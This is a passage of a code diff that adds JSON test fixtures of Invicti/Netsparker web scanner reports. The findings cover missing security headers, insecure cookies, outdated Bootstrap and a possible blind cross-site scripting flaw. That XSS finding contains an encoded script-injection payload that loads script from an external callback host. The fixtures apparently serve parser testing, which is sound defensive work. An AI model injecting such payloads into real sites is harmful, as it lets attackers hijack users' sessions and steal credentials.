    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "CspNotImplemented", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 70, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "19", + "Cvss": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "8.6" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "8.6" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "8.6" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + }, + "Cvss31": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "8.6" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "8.6" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "8.6" + }, + "Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + }, + "Cwe": "79", + "Hipaa": "164.308(a)", + "Owasp": "A3", + "OwaspProactiveControls": "", + "Pci32": "6.5.7", + "Wasc": "8" + }, + "Confirmed": false, + "Description": "

    Netsparker Enterprise detected Possible Blind Cross-site Scripting via capturing a triggered DNS A request, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application, but was unable to confirm the vulnerability.

    \n

    This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [], + "FirstSeenDate": "16/06/2021 12:38 PM", + "HttpRequest": { + "Content": "GET /products.php?pro=%27%22--%3e%3c%2fstyle%3e%3c%2fscRipt%3e%3cscRipt%20src%3d%22%2f%2fpbgjnvv2k89fhedxarfdk4pywx6zqjmszpdlk5ftvlu%26%2346%3br87%26%2346%3bme%22%3e%3c%2fscRipt%3e HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nCookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d\r\nReferer: http://php.testsparker.com/process.php\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [ + { + "Name": "pro", + "Type": "Querystring", + "Value": "'\"-->", + "Vulnerable": true + } + ] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 2824\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:51:00 GMT\r\n\r\n", + "Duration": 0.0, + "StatusCode": 0 + }, + "LookupId": "d442332c-e250-4c70-7b3c-ad490211f13b", + "Impact": "
    There are many different attacks that can be leveraged through the use of cross-site scripting, including:\n
      \n
    • Hijacking user's active session.
    • \n
    • Mounting phishing attacks.
    • \n
    • Intercepting data and performing man-in-the-middle attacks.
    • \n
    \n
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 02:01 AM", + "Name": "[Possible] Blind Cross-site Scripting", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    \n

    The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes in to a JavaScript block within the HTML document, then output needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.

    \n

    Additionally, you should implement a strong Content Security Policy (CSP) as a defense-in-depth measure if an XSS vulnerability is mistakenly introduced. Due to the complexity of XSS-Prevention and the lack of secure standard behavior in programming languages and frameworks, XSS vulnerabilities are still common in web applications.

    \n

    CSP will act as a safeguard that can prevent an attacker from successfully exploiting Cross-site Scripting vulnerabilities in your website and is advised in any kind of application. Please make sure to scan your application again with Content Security Policy checks enabled after implementing CSP, in order to avoid common mistakes that can impact the effectiveness of your policy. There are a few pitfalls that can render your CSP policy useless and we highly recommend reading the resources linked in the reference section before you start to implement one. 

    \n
    ", + "RemedyReferences": "", + "Severity": "High", + "State": "Revived", + "Type": "PossibleBlindXss", + "Url": "http://php.testsparker.com/products.php?pro=%27%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%3CscRipt%20src%3d%22%2f%2fpbgjnvv2k89fhedxarfdk4pywx6zqjmszpdlk5ftvlu%26%2346%3br87%26%2346%3bme%22%3E%3C%2fscRipt%3E" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "6.5" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "5.7" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "5.7" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N/E:U/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "200", + "Hipaa": "", + "Owasp": "A6", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "" + }, + "Confirmed": false, + "Description": "

    Netsparker Enterprise detected that no Referrer-Policy header implemented.

    \n

    Referrer-Policy is a security header designed to prevent cross-domain Referer leakage. 

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Page Type", + "Value": "Other" + } + ], + "FirstSeenDate": "16/06/2021 12:30 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "4576a39d-e4a5-481f-3fcf-ad490209f34b", + "Impact": "

    Referer header is a request header that indicates the site which the traffic originated from. If there is no adequate prevention in place, the  URL itself, and even sensitive information contained in the URL will be leaked to the cross-site.

    \n

    The lack of Referrer-Policy header might affect privacy of the users and site's itself

    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Referrer-Policy Not Implemented", + "ProofOfConcept": "", + "RemedialActions": "

    In a response header:

    \n
    Referrer-Policy: no-referrer | same-origin | origin | strict-origin | no-origin-when-downgrading 
    \n

    In a META tag

    \n
    <meta name=\"Referrer-Policy\" value=\"no-referrer | same-origin\"/>
    \n

    In an element attribute

    \n
    <a href=\"http://crosssite.example.com\" rel=\"noreferrer\"></a> 
    \n

    or

    \n
    <a href=\"http://crosssite.example.com\" referrerpolicy=\"no-referrer | same-origin | origin | strict-origin | no-origin-when-downgrading\"></a>
    ", + "RemedialProcedure": "

    Please implement a Referrer-Policy by using the Referrer-Policy response header or by declaring it in the meta tags. It’s also possible to control referrer information over an HTML-element by using the rel attribute.

    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "ReferrerPolicyNotImplemented", + "Url": "http://php.testsparker.com/" + } + ] +} \ No newline at end of file diff --git a/unittests/scans/invicti/invicti_one_finding.json b/unittests/scans/invicti/invicti_one_finding.json new file mode 100644 index 00000000000..9b717a0f5e6 --- /dev/null +++ b/unittests/scans/invicti/invicti_one_finding.json @@ -0,0 +1,85 @@ +{ + "Generated": "25/06/2021 09:59 AM", + "Target": { + "Duration": "00:00:41.3968969", + "Initiated": "25/06/2021 09:53 AM", + "ScanId": "663eb6e88d9e4f4d9e00ad52017aa66d", + "Url": "http://php.testsparker.com/" + }, + "Vulnerabilities": [ + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "107", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "5.7" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "5.5" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "5.5" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "16", + "Hipaa": "", + "Owasp": "A5", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "15" + }, + "Confirmed": true, + "Description": "

    Netsparker Enterprise identified a cookie not marked as HTTPOnly.

    \n

    HTTPOnly cookies cannot be read by client-side scripts, therefore marking a cookie as HTTPOnly can provide an additional layer of protection against cross-site scripting attacks.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Identified Cookie(s)", + "Value": "PHPSESSID" + }, + { + "Name": "Cookie Source", + "Value": "HTTP Header" + }, + { + "Name": "Page Type", + "Value": "Login" + } + ], + "FirstSeenDate": "16/06/2021 12:30 PM", + "HttpRequest": { + "Content": "GET /auth/login.php HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nReferer: http://php.testsparker.com/auth/\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nSet-Cookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d; path=/\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nContent-Length: 3061\r\nX-Powered-By: PHP/5.2.6\r\nPragma: no-cache\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\n\n\n", + "Duration": 41.4849, + "StatusCode": 200 + }, + "LookupId": "735f4503-e9eb-4b4c-4306-ad49020a4c4b", + "Impact": "
    During a cross-site scripting attack, an attacker might easily access cookies and hijack the victim's session.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Cookie Not Marked as HttpOnly", + "ProofOfConcept": "", + "RemedialActions": "
    \n
      \n
    1. See the remedy for solution.
    2. \n
    3. Consider marking all of the cookies used by the application as HTTPOnly. (After these changes javascript code will not be able to read cookies.)
    4. \n
    \n
    ", + "RemedialProcedure": "
    Mark the cookie as HTTPOnly. This will be an extra layer of defense against XSS. However this is not a silver bullet and will not protect the system against cross-site scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.
    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "CookieNotMarkedAsHttpOnly", + "Url": "http://php.testsparker.com/auth/login.php" + } + ] +} \ No newline at end of file diff --git a/unittests/scans/invicti/invicti_zero_finding.json b/unittests/scans/invicti/invicti_zero_finding.json new file mode 100644 index 00000000000..b33009971e5 --- /dev/null +++ b/unittests/scans/invicti/invicti_zero_finding.json @@ -0,0 +1,10 @@ +{ + "Generated": "25/06/2021 09:57 AM", + "Target": { + "Duration": "00:01:16.6130466", + "Initiated": "25/06/2021 01:42 AM", + "ScanId": "0a110f61b1f949ff30c8ad5104dfd9f5", + "Url": "http://php.testsparker.com/" + }, + "Vulnerabilities": [] +} \ No newline at end of file diff --git a/unittests/scans/invicti/issue_10311.json b/unittests/scans/invicti/issue_10311.json new file mode 100644 index 00000000000..3157fafb142 --- /dev/null +++ b/unittests/scans/invicti/issue_10311.json @@ -0,0 +1,173 @@ +{ + "Generated": "03/02/2019 15:50:29 (UTC-06:00)", + "Target": { + "ScanId": "fg49hk5", + "Url": "https://www.sampleweb.org/", + "Initiated": "03/02/2019 15:48:23 (UTC-06:00)", + "Duration": "00:01:20.4322725" + }, + "Vulnerabilities": [ + { + "Url": "https://www.sampleweb.org/", + "Type": "CookieNotMarkedAsSecure", + "Name": "Cookie Not Marked as Secure", + "Severity": "High", + "Certainty": 100, + "Confirmed": true, + "Classification": { + "Owasp": "A6", + "Owasp2017": "A3", + "Wasc": "15", + "Cwe": "614", + "Capec": "102", + "Pci31": "6.5.10", + "Pci32": "6.5.10", + "Hipaa": null + }, + "HttpRequest": { + "Method": "GET", + "Content": "GET / HTTP/1.1\r\nHost: www.sampleweb.org\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\r\nX-Scanner: Netsparker\r\n\r\n", + "Parameters": [ ] + }, + "HttpResponse": { + "StatusCode": 200, + "Duration": 644.6389, + "Content": "HTTP/1.1 200 OK\r\nX-Cache: MISS\r\nX-Timer: S1551563304.277046,VS0,VE20\r\nAge: 0\r\nCache-Control: max-age=600\r\nETag: W/\"5b8fd2e9-6807\"\r\nAccess-Control-Allow-Origin: *\r\nX-Fastly-Request-ID: 0345654a04250c6d1c420d386643c1f6dc7c3c24\r\nX-Served-By: cache-chi21166-CHI\r\nConnection: keep-alive\r\nExpires: Sat, 02 Mar 2019 21:58:24 GMT\r\nAccept-Ranges: bytes\r\nX-Cache-Hits: 0\r\nContent-Length: 5954\r\nX-GitHub-Request-Id: 0820:594C:6A9400:84F805:5C7AFA26\r\nVary: Accept-Encoding\r\nVia: 1.1 varnish\r\nLast-Modified: Wed, 05 Sep 2018 12:58:17 GMT\r\nContent-Type: text/html; charset=utf-8\r\nServer: GitHub.com\r\nDate: Sat, 02 Mar 2019 21:48:24 GMT\r\nContent-Encoding: \r\n\r\n" + }, + "ExtraInformation": [ + { + "Name": "Identified Cookie(s)", + "Value": "cookieconsent_status" + }, + { + "Name": "Cookie Source", + "Value": "JavaScript" + } + ], + "KnownVulnerabilities": [ ], + "Description": "

    Netsparker identified a cookie not marked as secure, and transmitted over HTTPS.

    This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic, or following a successful man-in-the-middle attack.

    ", + "Impact": "
    This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie), an attacker might intercept it and hijack a victim's session. If the attacker can carry out a man-in-the-middle attack, he/she can force the victim to make an HTTP request to steal the cookie.
    ", + "RemedialActions": "
    1. See the remedy for solution.
    2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information, you do not have to mark it as secure.)
    ", + "ExploitationSkills": "
    To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or to the victim's network. Attackers need to be understand layer 2, have physical access to systems either as waypoints for the traffic, or have locally gained access to to a system between the victim and the web server.
    ", + "RemedialProcedure": "
    Mark all cookies used within the application as secure.
    ", + "RemedyReferences": "", + "ExternalReferences": "", + "ProofOfConcept": "" + }, + { + "Url": "https://www.sampleweb.org/", + "Type": "BootstrapjsOutOfDate", + "Name": "Out-of-date Version (Bootstrap)", + "Severity": "Medium", + "Certainty": 90, + "Confirmed": false, + "Classification": { + "Owasp": "A9", + "Owasp2017": "A9", + "Wasc": null, + "Cwe": null, + "Capec": "310", + "Pci31": "6.2", + "Pci32": "6.2", + "Hipaa": null + }, + "HttpRequest": { + "Method": "GET", + "Content": "GET / HTTP/1.1\r\nHost: www.sampleweb.org\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\r\nX-Scanner: Netsparker\r\n\r\n", + "Parameters": [ ] + }, + "HttpResponse": { + "StatusCode": 200, + "Duration": 644.6389, + "Content": "HTTP/1.1 200 OK\r\nX-Cache: MISS\r\nX-Timer: S1551563304.277046,VS0,VE20\r\nAge: 0\r\nCache-Control: max-age=600\r\nETag: W/\"5b8fd2e9-6807\"\r\nAccess-Control-Allow-Origin: *\r\nX-Fastly-Request-ID: 0345654a04250c6d1c420d386643c1f6dc7c3c24\r\nX-Served-By: cache-chi21166-CHI\r\nConnection: keep-alive\r\nExpires: Sat, 02 Mar 2019 21:58:24 GMT\r\nAccept-Ranges: bytes\r\nX-Cache-Hits: 0\r\nContent-Length: 5954\r\nX-GitHub-Request-Id: 0820:594C:6A9400:84F805:5C7AFA26\r\nVary: Accept-Encoding\r\nVia: 1.1 varnish\r\nLast-Modified: Wed, 05 Sep 2018 12:58:17 GMT\r\nContent-Type: text/html; charset=utf-8\r\nServer: GitHub.com\r\nDate: Sat, 02 Mar 2019 21:48:24 GMT\r\nContent-Encoding: \r\n\r\n" + }, + "ExtraInformation": [ + { + "Name": "Identified Version", + "Value": "4.0.0" + }, + { + "Name": "Latest Version", + "Value": "4.3.1" + }, + { + "Name": "Vulnerability Database", + "Value": "Result is based on 3/1/2019 vulnerability database content." + } + ], + "KnownVulnerabilities": [ + { + "Title": "bootstrap.js Cross-Site Scripting (XSS) Vulnerability", + "Severity": "Medium" + }, + { + "Title": "bootstrap.js Cross-Site Scripting (XSS) Vulnerability", + "Severity": "Medium" + }, + { + "Title": "bootstrap.js Cross-Site Scripting (XSS) Vulnerability", + "Severity": "Medium" + }, + { + "Title": "bootstrap.js Cross-Site Scripting (XSS) Vulnerability", + "Severity": "Medium" + } + ], + "Description": "

    Netsparker identified that the target web site is using Bootstrap and detected that it is out of date.

    ", + "Impact": "
    Since this is an old version of the software, it may be vulnerable to attacks.
    ", + "RemedialActions": "", + "ExploitationSkills": "", + "RemedialProcedure": "
    \n

    Please upgrade your installation of Bootstrap to the latest stable version.

    \n
    ", + "RemedyReferences": "", + "ExternalReferences": "", + "ProofOfConcept": "" + }, + { + "Url": "https://www.sampleweb.org/", + "Type": "CookieNotMarkedAsHttpOnly", + "Name": "Cookie Not Marked as HttpOnly", + "Severity": "Low", + "Certainty": 100, + "Confirmed": true, + "Classification": { + "Owasp": "A5", + "Owasp2017": "A6", + "Wasc": "15", + "Cwe": "16", + "Capec": "107", + "Pci31": null, + "Pci32": null, + "Hipaa": null + }, + "HttpRequest": { + "Method": "GET", + "Content": "GET / HTTP/1.1\r\nHost: www.sampleweb.org\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\r\nX-Scanner: Netsparker\r\n\r\n", + "Parameters": [ ] + }, + "HttpResponse": { + "StatusCode": 200, + "Duration": 644.6389, + "Content": null + }, + "ExtraInformation": [ + { + "Name": "Identified Cookie(s)", + "Value": "cookieconsent_status" + }, + { + "Name": "Cookie Source", + "Value": "JavaScript" + } + ], + "KnownVulnerabilities": [ ], + "Description": "

    Netsparker identified a cookie not marked as HTTPOnly.

    HTTPOnly cookies cannot be read by client-side scripts, therefore marking a cookie as HTTPOnly can provide an additional layer of protection against cross-site scripting attacks.

    ", + "Impact": "
    During a cross-site scripting attack, an attacker might easily access cookies and hijack the victim's session.
    ", + "RemedialActions": "
    1. See the remedy for solution.
    2. Consider marking all of the cookies used by the application as HTTPOnly. (After these changes javascript code will not be able to read cookies.)
    ", + "ExploitationSkills": "", + "RemedialProcedure": "
    Mark the cookie as HTTPOnly. This will be an extra layer of defense against XSS. However this is not a silver bullet and will not protect the system against cross-site scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.
    ", + "RemedyReferences": "", + "ExternalReferences": "", + "ProofOfConcept": "" + } + ] +} \ No newline at end of file diff --git a/unittests/scans/invicti/issue_9816.json b/unittests/scans/invicti/issue_9816.json new file mode 100644 index 00000000000..14f7d156381 --- /dev/null +++ b/unittests/scans/invicti/issue_9816.json @@ -0,0 +1,173 @@ +{ + "Generated": "03/02/2019 15:50:29 (UTC-06:00)", + "Target": { + "ScanId": "fg49hk5", + "Url": "https://www.sampleweb.org/", + "Initiated": "03/02/2019 15:48:23 (UTC-06:00)", + "Duration": "00:01:20.4322725" + }, + "Vulnerabilities": [ + { + "Url": "https://www.sampleweb.org/", + "Type": "CookieNotMarkedAsSecure", + "Name": "Cookie Not Marked as Secure", + "Severity": "High", + "Certainty": 100, + "Confirmed": true, + "Classification": { + "Owasp": "A6", + "Owasp2017": "A3", + "Wasc": "15", + "Cwe": "614", + "Capec": "102", + "Pci31": "6.5.10", + "Pci32": "6.5.10", + "Hipaa": null + }, + "HttpRequest": { + "Method": "GET", + "Content": "GET / HTTP/1.1\r\nHost: www.sampleweb.org\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\r\nX-Scanner: Netsparker\r\n\r\n", + "Parameters": [ ] + }, + "HttpResponse": { + "StatusCode": 200, + "Duration": 644.6389, + "Content": "HTTP/1.1 200 OK\r\nX-Cache: MISS\r\nX-Timer: S1551563304.277046,VS0,VE20\r\nAge: 0\r\nCache-Control: max-age=600\r\nETag: W/\"5b8fd2e9-6807\"\r\nAccess-Control-Allow-Origin: *\r\nX-Fastly-Request-ID: 0345654a04250c6d1c420d386643c1f6dc7c3c24\r\nX-Served-By: cache-chi21166-CHI\r\nConnection: keep-alive\r\nExpires: Sat, 02 Mar 2019 21:58:24 GMT\r\nAccept-Ranges: bytes\r\nX-Cache-Hits: 0\r\nContent-Length: 5954\r\nX-GitHub-Request-Id: 0820:594C:6A9400:84F805:5C7AFA26\r\nVary: Accept-Encoding\r\nVia: 1.1 varnish\r\nLast-Modified: Wed, 05 Sep 2018 12:58:17 GMT\r\nContent-Type: text/html; charset=utf-8\r\nServer: GitHub.com\r\nDate: Sat, 02 Mar 2019 21:48:24 GMT\r\nContent-Encoding: \r\n\r\n" + }, + "ExtraInformation": [ + { + "Name": "Identified Cookie(s)", + "Value": "cookieconsent_status" + }, + { + "Name": "Cookie Source", + "Value": "JavaScript" + } + ], + "KnownVulnerabilities": [ ], + "Description": "

    Netsparker identified a cookie not marked as secure, and transmitted over HTTPS.

    This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic, or following a successful man-in-the-middle attack.

    ", + "Impact": "
    This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie), an attacker might intercept it and hijack a victim's session. If the attacker can carry out a man-in-the-middle attack, he/she can force the victim to make an HTTP request to steal the cookie.
    ", + "RemedialActions": "
    1. See the remedy for solution.
    2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information, you do not have to mark it as secure.)
    ", + "ExploitationSkills": "
    To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or to the victim's network. Attackers need to be understand layer 2, have physical access to systems either as waypoints for the traffic, or have locally gained access to to a system between the victim and the web server.
    ", + "RemedialProcedure": "
    Mark all cookies used within the application as secure.
    ", + "RemedyReferences": "", + "ExternalReferences": "", + "ProofOfConcept": "" + }, + { + "Url": "https://www.sampleweb.org/", + "Type": "BootstrapjsOutOfDate", + "Name": "Out-of-date Version (Bootstrap)", + "Severity": "Medium", + "Certainty": 90, + "Confirmed": false, + "Classification": { + "Owasp": "A9", + "Owasp2017": "A9", + "Wasc": null, + "Cwe": null, + "Capec": "310", + "Pci31": "6.2", + "Pci32": "6.2", + "Hipaa": null + }, + "HttpRequest": { + "Method": "GET", + "Content": "GET / HTTP/1.1\r\nHost: www.sampleweb.org\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\r\nX-Scanner: Netsparker\r\n\r\n", + "Parameters": [ ] + }, + "HttpResponse": { + "StatusCode": 200, + "Duration": 644.6389, + "Content": "HTTP/1.1 200 OK\r\nX-Cache: MISS\r\nX-Timer: S1551563304.277046,VS0,VE20\r\nAge: 0\r\nCache-Control: max-age=600\r\nETag: W/\"5b8fd2e9-6807\"\r\nAccess-Control-Allow-Origin: *\r\nX-Fastly-Request-ID: 0345654a04250c6d1c420d386643c1f6dc7c3c24\r\nX-Served-By: cache-chi21166-CHI\r\nConnection: keep-alive\r\nExpires: Sat, 02 Mar 2019 21:58:24 GMT\r\nAccept-Ranges: bytes\r\nX-Cache-Hits: 0\r\nContent-Length: 5954\r\nX-GitHub-Request-Id: 0820:594C:6A9400:84F805:5C7AFA26\r\nVary: Accept-Encoding\r\nVia: 1.1 varnish\r\nLast-Modified: Wed, 05 Sep 2018 12:58:17 GMT\r\nContent-Type: text/html; charset=utf-8\r\nServer: GitHub.com\r\nDate: Sat, 02 Mar 2019 21:48:24 GMT\r\nContent-Encoding: \r\n\r\n" + }, + "ExtraInformation": [ + { + "Name": "Identified Version", + "Value": "4.0.0" + }, + { + "Name": "Latest Version", + "Value": "4.3.1" + }, + { + "Name": "Vulnerability Database", + "Value": "Result is based on 3/1/2019 vulnerability database content." + } + ], + "KnownVulnerabilities": [ + { + "Title": "bootstrap.js Cross-Site Scripting (XSS) Vulnerability", + "Severity": "Medium" + }, + { + "Title": "bootstrap.js Cross-Site Scripting (XSS) Vulnerability", + "Severity": "Medium" + }, + { + "Title": "bootstrap.js Cross-Site Scripting (XSS) Vulnerability", + "Severity": "Medium" + }, + { + "Title": "bootstrap.js Cross-Site Scripting (XSS) Vulnerability", + "Severity": "Medium" + } + ], + "Description": "

    Netsparker identified that the target web site is using Bootstrap and detected that it is out of date.

    ", + "Impact": "
    Since this is an old version of the software, it may be vulnerable to attacks.
    ", + "RemedialActions": "", + "ExploitationSkills": "", + "RemedialProcedure": "
    \n

    Please upgrade your installation of Bootstrap to the latest stable version.

    \n
    ", + "RemedyReferences": "", + "ExternalReferences": "", + "ProofOfConcept": "" + }, + { + "Url": "https://www.sampleweb.org/", + "Type": "CookieNotMarkedAsHttpOnly", + "Name": "Cookie Not Marked as HttpOnly", + "Severity": "Low", + "Certainty": 100, + "Confirmed": true, + "Classification": { + "Owasp": "A5", + "Owasp2017": "A6", + "Wasc": "15", + "Cwe": "16", + "Capec": "107", + "Pci31": null, + "Pci32": null, + "Hipaa": null + }, + "HttpRequest": { + "Method": "GET", + "Content": "GET / HTTP/1.1\r\nHost: www.sampleweb.org\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\r\nX-Scanner: Netsparker\r\n\r\n", + "Parameters": [ ] + }, + "HttpResponse": { + "StatusCode": 200, + "Duration": 644.6389, + "Content": "HTTP/1.1 200 OK\r\nX-Cache: MISS\r\nX-Timer: S1551563304.277046,VS0,VE20\r\nAge: 0\r\nCache-Control: max-age=600\r\nETag: W/\"5b8fd2e9-6807\"\r\nAccess-Control-Allow-Origin: *\r\nX-Fastly-Request-ID: 0345654a04250c6d1c420d386643c1f6dc7c3c24\r\nX-Served-By: cache-chi21166-CHI\r\nConnection: keep-alive\r\nExpires: Sat, 02 Mar 2019 21:58:24 GMT\r\nAccept-Ranges: bytes\r\nX-Cache-Hits: 0\r\nContent-Length: 5954\r\nX-GitHub-Request-Id: 0820:594C:6A9400:84F805:5C7AFA26\r\nVary: Accept-Encoding\r\nVia: 1.1 varnish\r\nLast-Modified: Wed, 05 Sep 2018 12:58:17 GMT\r\nContent-Type: text/html; charset=utf-8\r\nServer: GitHub.com\r\nDate: Sat, 02 Mar 2019 21:48:24 GMT\r\nContent-Encoding: \r\n\r\n" + }, + "ExtraInformation": [ + { + "Name": "Identified Cookie(s)", + "Value": "cookieconsent_status" + }, + { + "Name": "Cookie Source", + "Value": "JavaScript" + } + ], + "KnownVulnerabilities": [ ], + "Description": "

    Netsparker identified a cookie not marked as HTTPOnly.

    HTTPOnly cookies cannot be read by client-side scripts, therefore marking a cookie as HTTPOnly can provide an additional layer of protection against cross-site scripting attacks.

    ", + "Impact": "
    During a cross-site scripting attack, an attacker might easily access cookies and hijack the victim's session.
    ", + "RemedialActions": "
    1. See the remedy for solution.
